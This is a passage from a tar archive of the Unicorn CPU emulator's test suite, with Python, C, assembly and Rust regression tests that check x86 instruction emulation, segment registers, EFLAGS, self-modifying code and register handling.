CODE_SIZE) uc.mem_map(SCRATCH_ADDR, SCRATCH_SIZE) code = '6448330C2518000000'.decode('hex') # x86-64: xor rcx, qword ptr fs:[0x18] uc.mem_write(CODE_ADDR, code) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAAAAAA') set_fs(uc, SEGMENT_ADDR) self.assertEqual(SEGMENT_ADDR, get_fs(uc)) uc.emu_start(CODE_ADDR, CODE_ADDR+len(code)) self.assertEqual(uc.reg_read(UC_X86_REG_RCX), 0x4141414141414141) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_eflags.py�����������������������������������������������������������0000775�0000000�0000000�00000002040�14675241067�0020337�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import regress import unicorn as U class WrongEFLAGS2(regress.RegressTest): def test_eflags(self): # imul eax, ebx CODE = '\x0f\xaf\xc3' uc = U.Uc(U.UC_ARCH_X86, U.UC_MODE_32) uc.reg_write(U.x86_const.UC_X86_REG_EAX, 16) uc.reg_write(U.x86_const.UC_X86_REG_EBX, 1) uc.reg_write(U.x86_const.UC_X86_REG_EFLAGS, 0x292) uc.mem_map(0x600000, 0x1000) uc.mem_write(0x6000b0, CODE) uc.emu_start(0x6000b0, 0, count=1) # Here's the original execution trace for this on actual hardware. # # (gdb) x/i $eip # => 0x804aae5: imul eax,DWORD PTR [ebp-0x8] # (gdb) p/x $eax # $2 = 0x10 # (gdb) x/wx $ebp-8 # 0xbaaaad4c: 0x00000001 # (gdb) p/x $eflags # $3 = 0x292 # (gdb) si # 0x0804aae9 in ?? 
() # (gdb) p/x $eflags # $4 = 0x202 self.assertEqual(0x202, uc.reg_read(U.x86_const.UC_X86_REG_EFLAGS)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_fldt_fsqrt.py�������������������������������������������������������0000775�0000000�0000000�00000001301�14675241067�0021245�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress CODE_ADDR = 0x1000000 CODE = ( '\xb8\x00\x00\x00\x02' # mov eax, 0x2000000 '\xdb\x28' # fldt [eax] '\xd9\xfa' # fsqrt ) DATA_ADDR = 0x2000000 DATA = '\0\0\0\0\0\0\0\0\0\1' class FldtFsqrt(regress.RegressTest): def test_fldt_fsqrt(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(CODE_ADDR, 0x1000) uc.mem_write(CODE_ADDR, CODE) uc.mem_map(DATA_ADDR, 0x1000) uc.mem_write(DATA_ADDR, DATA) uc.emu_start(CODE_ADDR, CODE_ADDR + len(CODE), 10000, 10) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_gdt.py��������������������������������������������������������������0000775�0000000�0000000�00000004036�14675241067�0017663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import regress F_GRANULARITY = 0x8 F_PROT_32 = 0x4 F_LONG = 0x2 F_AVAILABLE = 0x1 A_PRESENT = 0x80 A_PRIV_3 = 0x60 A_PRIV_2 = 0x40 A_PRIV_1 = 0x20 A_PRIV_0 = 0x0 A_CODE = 0x10 A_DATA = 0x10 A_TSS = 0x0 A_GATE = 0x0 A_DATA_WRITABLE = 0x2 A_CODE_READABLE = 0x2 A_DIR_CON_BIT = 0x4 S_GDT = 0x0 S_LDT = 0x4 S_PRIV_3 = 0x3 S_PRIV_2 = 0x2 S_PRIV_1 = 0x1 S_PRIV_0 = 0x0 CODE = '65330d18000000'.decode('hex') # xor ecx, dword ptr gs:[0x18] def create_selector(idx, flags): to_ret = flags to_ret |= idx << 3 return to_ret def create_gdt_entry(base, limit, access, flags): to_ret = limit & 0xffff; to_ret |= (base & 0xffffff) << 16; to_ret |= (access & 0xff) << 40; to_ret |= ((limit >> 16) & 0xf) << 48; to_ret |= (flags & 0xff) << 52; to_ret |= ((base >> 24) & 0xff) << 56; return pack('<Q',to_ret) def hook_mem_read(uc, type, addr,*args): print(hex(addr)) return False CODE_ADDR = 
0x40000 CODE_SIZE = 0x1000 GDT_ADDR = 0x3000 GDT_LIMIT = 0x1000 GDT_ENTRY_SIZE = 0x8 SEGMENT_ADDR = 0x5000 SEGMENT_SIZE = 0x1000 class GdtRead(regress.RegressTest): def test_gdt(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.hook_add(UC_HOOK_MEM_READ_UNMAPPED, hook_mem_read) uc.mem_map(GDT_ADDR, GDT_LIMIT) uc.mem_map(SEGMENT_ADDR, SEGMENT_SIZE) uc.mem_map(CODE_ADDR, CODE_SIZE) uc.mem_write(CODE_ADDR, CODE) uc.mem_write(SEGMENT_ADDR+0x18, 'AAAA') gdt_entry = create_gdt_entry(SEGMENT_ADDR, SEGMENT_SIZE, A_PRESENT | A_DATA | A_DATA_WRITABLE | A_PRIV_3 | A_DIR_CON_BIT, F_PROT_32) uc.mem_write(GDT_ADDR + 8, gdt_entry) uc.reg_write(UC_X86_REG_GDTR, (0, GDT_ADDR, GDT_LIMIT, 0x0)) selector = create_selector(1, S_GDT | S_PRIV_3) uc.reg_write(UC_X86_REG_GS, selector) uc.emu_start(CODE_ADDR, CODE_ADDR+len(CODE)) self.assertEqual(uc.reg_read(UC_X86_REG_ECX), 0x41414141) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_ld_crash.py���������������������������������������������������������0000775�0000000�0000000�00000014723�14675241067�0020670�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.x86_const import * from capstone import * # extract from ld.so shellcode = [0x55, 0x89, 0xE5, 0x57, 0x56, 0x53, 0xE8, 0xE0, 0x9F, 0x01, 0x00, 0x81, 0xC3, 0xF5, 0x57, 0x02, 0x00, 0x83, 0xEC, 0x3C, 0x0F, 0x31, 0x89, 0x93, 0xE4, 0xF8, 0xFF, 0xFF, 0x8D, 0x93, 0x34, 0xFF, 0xFF, 0xFF, 0x89, 0x83, 0xE0, 0xF8, 0xFF, 0xFF, 0x8B, 0x83, 0x34, 0xFF, 0xFF, 0xFF, 0x89, 0xD6, 0x2B, 0xB3, 0x00, 0x00, 0x00, 0x00, 0x89, 0x93, 0x60, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x89, 0xB3, 0x58, 0x05, 0x00, 0x00, 0x74, 0x5A, 0xBF, 0xFF, 0xFF, 0xFF, 0x6F, 0xEB, 0x1C, 0x8D, 0x76, 0x00, 0xB9, 0x21, 0x00, 0x00, 0x70, 0x29, 0xC1, 0x89, 0xC8, 0x89, 0x94, 0x83, 0x78, 0x05, 0x00, 0x00, 0x83, 0xC2, 0x08, 0x8B, 0x02, 0x85, 0xC0, 0x74, 0x37, 0x83, 0xF8, 0x21, 0x76, 0xEB, 0x89, 0xF9, 0x29, 0xC1, 0x83, 0xF9, 0x0F, 0x76, 0xD9, 0x8D, 0x0C, 0x00, 0xD1, 0xF9, 0x83, 0xF9, 0xFC, 0x0F, 0x86, 0xDB, 0x02, 0x00, 0x00, 0xF7, 0xD1, 0x89, 0x94, 0x8B, 0x40, 0x06, 0x00, 0x00, 0x83, 0xC2, 0x08, 0x8B, 0x02, 0x85, 0xC0, 0x75, 0xD2, 0x89, 0xF6, 0x8D, 0xBC, 0x27, 0x00, 0x00, 0x00, 0x00, 0x85, 0xF6, 0x74, 0x68, 0x8B, 0x83, 0x88, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x84, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x8C, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x90, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0xBC, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0xD4, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x83, 0x3C, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 
0x83, 0xA4, 0x06, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x03, 0x01, 0x70, 0x04, 0x8B, 0x93, 0xC8, 0x05, 0x00, 0x00, 0x85, 0xD2, 0x74, 0x0A, 0x83, 0x7A, 0x04, 0x11, 0x0F, 0x85, 0x24, 0x04, 0x00, 0x00, 0x8B, 0x83, 0xBC, 0x05, 0x00, 0x00, 0x85, 0xC0, 0x74, 0x10, 0x8B, 0x8B, 0xC4, 0x05, 0x00, 0x00, 0x83, 0x79, 0x04, 0x08, 0x0F, 0x85, 0xEB, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0x10, 0x06, 0x00, 0x00, 0x85, 0xC9, 0x74, 0x0D, 0xF7, 0x41, 0x04, 0xFE, 0xFF, 0xFF, 0xFF, 0x0F, 0x85, 0xB5, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0xF0, 0x05, 0x00, 0x00, 0x85, 0xC9, 0x74, 0x0D, 0xF7, 0x41, 0x04, 0xF7, 0xFF, 0xFF, 0xFF, 0x0F, 0x85, 0x7F, 0x03, 0x00, 0x00, 0x8B, 0x8B, 0xEC, 0x05, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x85, 0x52, 0x03, 0x00, 0x00, 0x8B, 0xBB, 0xB4, 0x05, 0x00, 0x00, 0x85, 0xFF, 0x0F, 0x85, 0x25, 0x03, 0x00, 0x00, 0x85, 0xF6, 0x0F, 0x85, 0xA4, 0x00, 0x00, 0x00, 0x8B, 0x8B, 0x74, 0x06, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, 0x96, 0x00, 0x00, 0x00, 0x8D, 0xB3, 0x58, 0x05, 0x00, 0x00, 0x83, 0xEC, 0x0C, 0x80, 0x8B, 0xEC, 0x06, 0x00, 0x00, 0x04, 0x56, 0xE8, 0x00, 0x95, 0x00, 0x00, 0x8D, 0x83, 0x00, 0x90, 0xFD, 0xFF, 0x89, 0xB3, 0x6C, 0x05, 0x00, 0x00, 0x89, 0x83, 0x04, 0x07, 0x00, 0x00, 0x8D, 0x83, 0x38, 0x09, 0x00, 0x00, 0x89, 0x83, 0x08, 0x07, 0x00, 0x00, 0x8D, 0x83, 0xFB, 0x47, 0xFF, 0xFF, 0x89, 0x83, 0x0C, 0x07, 0x00, 0x00, 0x0F, 0x31, 0x89, 0x83, 0x40, 0x05, 0x00, 0x00, 0x89, 0x93, 0x44, 0x05, 0x00, 0x00, 0x58, 0x8D, 0x83, 0x30, 0xAE, 0xFD, 0xFF, 0x89, 0xAB, 0x2C, 0xFF, 0xFF, 0xFF, 0x5A, 0x50, 0xFF, 0x75, 0x08, 0xE8, 0x81, 0x61, 0x01, 0x00, 0x89, 0xC6, 0x0F, 0x31, 0x2B, 0x83, 0xE0, 0xF8, 0xFF, 0xFF, 0x1B, 0x93, 0xE4, 0xF8, 0xFF, 0xFF, 0x83, 0xC4, 0x10, 0xF6, 0x83, 0x00, 0xF9, 0xFF, 0xFF, 0x80, 0x89, 0x45, 0xE0, 0x89, 0x55, 0xE4, 0x0F, 0x85, 0x53, 0x02, 0x00, 0x00, 0x8D, 0x65, 0xF4, 0x89, 0xF0, 0x5B, 0x5E, 0x5F, 0x5D, 0xC3, 0x90, 0x85, 0xC0, 0x0F, 0x84, 0x18, 0x02, 0x00, 0x00, 0x8B, 0x48, 0x04, 0x8B, 0x83, 0xC0, 0x05, 0x00, 0x00, 0x8B, 0x78, 0x04, 0x8B, 0x83, 0x14, 0x06, 0x00, 0x00, 0x89, 0x4D, 0xC8, 0x89, 0x4D, 0xD4, 0x89, 0x45, 0xC4, 0x8B, 0x45, 0xC4, 0x89, 0x7D, 0xD0, 0x01, 0xCF, 0x89, 0x7D, 0xCC, 0x89, 0xCF, 0x85, 0xC0, 0x74, 0x06, 0x8B, 0x48, 0x04, 0x8D, 0x0C, 0xCF, 0x85, 0xD2, 0x74, 0x2E, 0x8B, 0x83, 0xD4, 0x05, 0x00, 0x00, 0x8B, 0x93, 0x80, 0x05, 0x00, 0x00, 0x8B, 0x78, 0x04, 0x8B, 0x52, 0x04, 0x8B, 0x45, 0xD0, 0x01, 0xD7, 0x29, 0xD0, 0x3B, 0x7D, 0xCC, 0x89, 0x45, 0xC4, 0x8B, 0x45, 0xD0, 0x0F, 0x44, 0x45, 0xC4, 0x03, 0x55, 0xC8, 0x01, 0xD0, 0x89, 0x45, 0xCC, 0x8B, 0x93, 0x90, 0x05, 0x00, 0x00, 0x39, 0x4D, 0xD4, 0x8B, 0x42, 0x04, 0x89, 0x45, 0xC8, 0x73, 0x32, 0x8B, 0x45, 0xD4, 0x89, 0xF2, 0x03, 0x10, 0x80, 0x78, 0x04, 0x08, 0x0F, 0x85, 0xCC, 0x01, 0x00, 0x00, 0x8B, 0x45, 0xD4, 0xEB, 0x13, 0x90, 0x8D, 0x74, 0x26, 0x00, 0x8B, 0x10, 0x01, 0xF2, 0x80, 0x78, 0x04, 0x08, 0x0F, 0x85, 0xB4, 0x01, 0x00, 0x00, 0x83, 0xC0, 0x08, 0x01, 0x32, 0x39, 0xC8, 0x72, 0xE9, 0x8B, 0xBB, 0x3C, 0x06, 0x00, 0x00, 0x85, 0xFF, 0x0F, 0x84, 0x73, 0x02, 0x00, 0x00, 0x8D, 0x05, 0x40, 0x00, 0x00, 0x00, 0x39, 0x4D, 0xCC, 0x89, 0x45, 0xD0, 0x8D, 0x83, 0xE0, 0xFB, 0xFE, 0xFF, 0x89, 0x45, 0xC0, 0x0F, 0x86, 0x92, 0xFE, 0xFF, 0xFF, 0x89, 0x75, 0xC4, 0x90, 0x8D, 0x74, 0x26, 0x00, 0x8B, 0x7D, 0xC4, 0x03, 0x39, 0x8B, 0x41, 0x04, 0x8B, 0x55, 0xD0, 0x89, 0x7D, 0xD4, 0x89, 0xC7, 0x0F, 0xB6, 0xF0, 0xC1, 0xEF, 0x08, 0xC1, 0xE7, 0x04, 0x03, 0x7D, 0xC8, 0x8B, 0x47, 0x04, 0x03, 0x84, 0x1A, 0x18, 0x05, 0x00, 0x00, 0x0F, 0xB6, 0x57, 0x0C, 0x83, 0xE2, 0x0F, 0x80, 0xFA, 0x0A, 0x0F, 0x84, 0xEA, 0x00, 0x00, 0x00, 0x83, 0xEE, 0x06, 0x83, 0xFE, 0x23, 0x77, 0x4A, 0x8B, 0x94, 
0xB3, 0x00, 0x48, 0xFF, 0xFF, 0x01, 0xDA, 0xFF, 0xE2, 0x8D, 0xB4, 0x26, 0x00, 0x00, 0x00, 0x00, 0xB9, 0xFF, 0xFD, 0xFF, 0x6F, 0x29, 0xC1, 0x83, 0xF9, 0x0B, 0x0F, 0x87, 0xA0, 0x00, 0x00, 0x00, 0xF7, 0xD8, 0x89, 0x94, 0x83, 0x48, 0xFE, 0xFF, 0xBF, 0xE9, 0xE2, 0xFC, 0xFF, 0xFF, 0x66, 0x90, 0x8B, 0x45, 0xD0, 0x8B, 0x75, 0xD4, 0x8B, 0x84, 0x18, 0x58, 0x07, 0x00, 0x00, 0x03, 0x06, 0x2B, 0x47, 0x04, 0x89, 0x06, 0x8D, 0x74, 0x26, 0x00, 0x83, 0xC1, 0x08, 0x39, 0x4D, 0xCC, 0x0F, 0x87, 0x6C, 0xFF, 0xFF, 0xFF, 0xE9, 0xF1, 0xFD, 0xFF, 0xFF, 0x8D, 0xB4, 0x26, 0x00, 0x00, 0x00, 0x00, 0x8B, 0x75, 0xD4, 0x8B, 0x46, 0x04, 0x03, 0x47, 0x04, 0x8B, 0x7D, 0xD0, 0x2B, 0x84, 0x1F, 0x58, 0x07, 0x00, 0x00, 0x89, 0x46, 0x04, 0x8B, 0x45, 0xC0, 0x89, 0x06, 0xEB, 0xCB, 0x8D, 0x76, 0x00, 0x8B, 0x7D, 0xD4, 0x89, 0x07, 0xEB, 0xC1, 0x89, 0xF6, 0x8D, 0xBC, 0x27, 0x00, 0x00, 0x00, 0x00] baseaddr = 0x47bb800 crash_point = 0x47bba6e # mov eax, [ebx + 0x5d4] uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(baseaddr - baseaddr%0x1000, 0x4000) # code uc.mem_map(0x8000, 0x1000) # stack uc.mem_map(0x1000, 0x1000) # [ebx + 0x5d4] uc.mem_write(0x1000 + 0x5d4, b"\xff\xff\xff\xff") uc.mem_write(baseaddr, bytes(shellcode)) uc.reg_write(UC_X86_REG_EIP, crash_point) uc.reg_write(UC_X86_REG_ESP, 0x90000) uc.reg_write(UC_X86_REG_EBX, 0x1000) uc.emu_start(begin=crash_point, until=0, count=2) print(f"eax={bytes(uc.mem_read(0x1000+ 0x5d4, 4))}")���������������������������������������������unicorn-2.1.1/tests/regress/x86_self_modifying.elf��������������������������������������������������0000775�0000000�0000000�00000001320�14675241067�0022212�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������ELF��������������t4���������4� ��(������������������������Qtd���������������������������@��5-������-1Ҹ���̀�t IC����^N 1҃t-���B-E�����������������������t������������������ ��������������������0��������������������+���ڀ�������$���t������5���ڐ������A���ڐ������0���ܐ�������stuff.o�self_modifying�memcpy�_loop_start�_loop_end�__bss_start�_edata��.symtab�.strtab�.shstrtab�.text�����������������������������������������������������tt���f����������������������������������!�������������������������������������������������� ����������������H����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_self_modifying.py���������������������������������������������������0000775�0000000�0000000�00000002072�14675241067�0022101�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python from unicorn import * from unicorn.x86_const import * from struct import pack import os import regress # The file we're loading is a full assembled ELF. 
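# (What the binary does: the stub repeatedly copies and patches itself in
# writable memory, and eventually issues `int 0x80`; the UC_HOOK_INTR handler
# below stops emulation there, and the test expects EBX -- the would-be exit
# status -- to be 65.)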
# The source for it, along with assembly instructions, is in x86_self_modifying.s

CODE_ADDR = 0x08048000
STACK_ADDR = 0x2000000
CODE = open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'x86_self_modifying.elf'), 'rb').read()
CODE_SIZE = len(CODE) + (0x1000 - len(CODE) % 0x1000)
STACK_SIZE = 0x8000
ENTRY_POINT = 0x8048074

def hook_intr(uc, intno, data):
    uc.emu_stop()

class SelfModifying(regress.RegressTest):
    def test_self_modifying(self):
        uc = Uc(UC_ARCH_X86, UC_MODE_32)
        uc.mem_map(CODE_ADDR, CODE_SIZE, 5)    # 5 = UC_PROT_READ | UC_PROT_EXEC
        uc.mem_map(STACK_ADDR, STACK_SIZE, 7)  # 7 = UC_PROT_ALL; the stub patches itself on the stack
        uc.mem_write(CODE_ADDR, CODE)
        uc.reg_write(UC_X86_REG_ESP, STACK_ADDR + STACK_SIZE)
        uc.hook_add(UC_HOOK_INTR, hook_intr)
        uc.emu_start(ENTRY_POINT, -1)
        retcode = uc.reg_read(UC_X86_REG_EBX)
        self.assertEqual(retcode, 65)

if __name__ == '__main__':
    regress.main()
unicorn-2.1.1/tests/regress/x86_self_modifying.s0000664000000000000000000000221114675241067ustar00rootroot
# Assembly instructions (tested on ubuntu 16.04 x86_64):
# $ as --32 x86_self_modifying.s -o x86_self_modifying.o
# $ ld -melf_i386 -z execstack x86_self_modifying.o -o x86_self_modifying.elf

# Test that it works. The return code should be 65.
# $ ./x86_self_modifying.elf
# $ echo $?
# 65 # Fix the entry point address in x86_self_modifying.py # $ readelf -h x86_self_modifying.elf | grep Entry # Entry point address: 0x8048074 .intel_syntax noprefix .global _start _start: mov ebp, esp sub ebp, 0x4000 mov edx, ebp lea esi, [self_modifying] mov edi, ebp mov ecx, 0x2d call memcpy add ebp, 0x2d xor ebx, ebx call edx mov eax, 1 int 0x80 memcpy: cmp ecx, 0 je _end dec ecx mov al, byte ptr [esi+ecx] mov byte ptr [edi+ecx], al jmp memcpy _end: ret self_modifying: inc ebx call $+5 pop esi dec byte ptr [esi+11] xor edx, edx sub esi, 6 _loop_start: cmp edx, 5 jz _loop_end mov edi, ebp mov ecx, 0x2d lea eax, [memcpy] call eax inc edx add ebp, 0x2d mov byte ptr [ebp], 0xc3 jmp _loop_start _loop_end: ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/x86_set_ip.py�����������������������������������������������������������0000664�0000000�0000000�00000000722�14675241067�0020363�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������from unicorn import * from unicorn.x86_const import * count = 0 def cb(uc, addr, sz, data): global count count += 1 print(f"addr: {hex(addr)} count: {count}") if count == 5: uc.emu_stop() else: uc.reg_write(UC_X86_REG_RIP, 0x2000) mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0x1000, 0x4000) mu.mem_write(0x1000, b"\x90" * 5) mu.mem_write(0x2000, b"\x90" * 5) mu.hook_add(UC_HOOK_CODE, cb) mu.emu_start(0x1000, 0x2000+1, 0, 0) ����������������������������������������������unicorn-2.1.1/tests/regress/x86_vex.c���������������������������������������������������������������0000664�0000000�0000000�00000005033�14675241067�0017474�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn/unicorn.h" #include <assert.h> #include <stdio.h> #define OK(x) {uc_err __err; if ((__err = x)) { fprintf(stderr, "%s", uc_strerror(__err)); assert(false); } } static void test_vmovdqu(void) { uc_engine *uc; int r_esi = 0x1234; int r_edi = 0x7890; uint64_t r_xmm0[2] = {0x08090a0b0c0d0e0f, 0x0001020304050607}; /* 128 bit at address esi (0x1234) this should not be read into xmm0 */ char mem_esi[] = { '\xE7', '\x1D', '\xA7', '\xE8', '\x88', '\xE4', '\x94', '\x40', '\x54', '\x74', '\x24', '\x97', '\x1F', '\x2E', '\xB6', '\x40' }; /* 128 bit at address edi (0x7890) this SHOULD be read into xmm0 */ char mem_edi[] = { '\xAD', '\xFA', '\x5C', '\x6D', '\x45', '\x4A', '\x93', '\x40', '\xD2', '\x00', '\xDE', '\x02', '\x89', '\xE8', '\x94', '\x40' }; /* vmovdqu xmm0, [edi] */ char code[] = { '\xC5', '\xFA', '\x6F', '\x07' }; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_32, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, 
UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); // initialize machine registers; OK(uc_reg_write(uc, UC_X86_REG_XMM0, &r_xmm0)); OK(uc_reg_write(uc, UC_X86_REG_ESI, &r_esi)); OK(uc_reg_write(uc, UC_X86_REG_EDI, &r_edi)); OK(uc_mem_write(uc, r_esi, mem_esi, sizeof(mem_esi) / sizeof(mem_esi[0]))); OK(uc_mem_write(uc, r_edi, mem_edi, sizeof(mem_edi) / sizeof(mem_edi[0]))); OK(uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0)); /* Read xmm0 after emulation */ OK(uc_reg_read(uc, UC_X86_REG_XMM0, &r_xmm0)); assert(0x4094e88902de00d2 == r_xmm0[0] && 0x40934a456d5cfaad == r_xmm0[1]); OK(uc_close(uc)); } /* https://github.com/unicorn-engine/unicorn/issues/1656 */ static void test_vex_l(void) { uc_engine *uc; uc_err err; /* vmovdqu ymm1, [rcx] */ char code[] = { '\xC5', '\xFE', '\x6F', '\x09' }; /* initialize memory and run emulation */ OK(uc_open(UC_ARCH_X86, UC_MODE_64, &uc)); OK(uc_mem_map(uc, 0, 2 * 1024 * 1024, UC_PROT_ALL)); OK(uc_mem_write(uc, 0, code, sizeof(code) / sizeof(code[0]))); err = uc_emu_start(uc, 0, sizeof(code) / sizeof(code[0]), 0, 0); if(err != UC_ERR_INSN_INVALID) { fprintf(stderr, "%s", uc_strerror(err)); assert(false); } OK(uc_close(uc)); } /* TODO: Add more vex prefixed instructions Suggestions: vxorpd, vxorps, vandpd, ... */ int main(int argc, char **argv, char **envp) { test_vmovdqu(); test_vex_l(); return 0; } �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/rust-tests/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016503�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/rust-tests/main.rs��������������������������������������������������������������0000664�0000000�0000000�00000061647�14675241067�0020013�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������extern crate alloc; use alloc::rc::Rc; use core::cell::RefCell; use unicorn_engine::unicorn_const::{ uc_error, Arch, HookType, MemType, Mode, Permission, SECOND_SCALE, TlbEntry, TlbType }; use unicorn_engine::{InsnSysX86, RegisterARM, RegisterMIPS, RegisterPPC, RegisterX86, Unicorn}; pub static X86_REGISTERS: [RegisterX86; 125] = [ RegisterX86::AH, RegisterX86::AL, RegisterX86::AX, RegisterX86::BH, RegisterX86::BL, RegisterX86::BP, RegisterX86::BPL, RegisterX86::BX, RegisterX86::CH, RegisterX86::CL, RegisterX86::CS, RegisterX86::CX, RegisterX86::DH, RegisterX86::DI, RegisterX86::DIL, RegisterX86::DL, RegisterX86::DS, RegisterX86::DX, 
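    // (This register list is also iterated by x86_context_save_and_restore
    // below to compare every register between a saved and a restored context.)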
RegisterX86::EAX, RegisterX86::EBP, RegisterX86::EBX, RegisterX86::ECX, RegisterX86::EDI, RegisterX86::EDX, RegisterX86::EFLAGS, RegisterX86::EIP, RegisterX86::ES, RegisterX86::ESI, RegisterX86::ESP, RegisterX86::FPSW, RegisterX86::FS, RegisterX86::GS, RegisterX86::IP, RegisterX86::RAX, RegisterX86::RBP, RegisterX86::RBX, RegisterX86::RCX, RegisterX86::RDI, RegisterX86::RDX, RegisterX86::RIP, RegisterX86::RSI, RegisterX86::RSP, RegisterX86::SI, RegisterX86::SIL, RegisterX86::SP, RegisterX86::SPL, RegisterX86::SS, RegisterX86::CR0, RegisterX86::CR1, RegisterX86::CR2, RegisterX86::CR3, RegisterX86::CR4, RegisterX86::CR8, RegisterX86::DR0, RegisterX86::DR1, RegisterX86::DR2, RegisterX86::DR3, RegisterX86::DR4, RegisterX86::DR5, RegisterX86::DR6, RegisterX86::DR7, RegisterX86::FP0, RegisterX86::FP1, RegisterX86::FP2, RegisterX86::FP3, RegisterX86::FP4, RegisterX86::FP5, RegisterX86::FP6, RegisterX86::FP7, RegisterX86::K0, RegisterX86::K1, RegisterX86::K2, RegisterX86::K3, RegisterX86::K4, RegisterX86::K5, RegisterX86::K6, RegisterX86::K7, RegisterX86::MM0, RegisterX86::MM1, RegisterX86::MM2, RegisterX86::MM3, RegisterX86::MM4, RegisterX86::MM5, RegisterX86::MM6, RegisterX86::MM7, RegisterX86::R8, RegisterX86::R9, RegisterX86::R10, RegisterX86::R11, RegisterX86::R12, RegisterX86::R13, RegisterX86::R14, RegisterX86::R15, RegisterX86::ST0, RegisterX86::ST1, RegisterX86::ST2, RegisterX86::ST3, RegisterX86::ST4, RegisterX86::ST5, RegisterX86::ST6, RegisterX86::ST7, RegisterX86::R8B, RegisterX86::R9B, RegisterX86::R10B, RegisterX86::R11B, RegisterX86::R12B, RegisterX86::R13B, RegisterX86::R14B, RegisterX86::R15B, RegisterX86::R8D, RegisterX86::R9D, RegisterX86::R10D, RegisterX86::R11D, RegisterX86::R12D, RegisterX86::R13D, RegisterX86::R14D, RegisterX86::R15D, RegisterX86::R8W, RegisterX86::R9W, RegisterX86::R10W, RegisterX86::R11W, RegisterX86::R12W, RegisterX86::R13W, RegisterX86::R14W, RegisterX86::R15W, ]; #[test] fn emulate_x86() { let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.reg_write(RegisterX86::EAX, 123), Ok(())); assert_eq!(emu.reg_read(RegisterX86::EAX), Ok(123)); // Attempt to write to memory before mapping it. 
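    // Note: the write below is expected to fail with uc_error::WRITE_UNMAPPED
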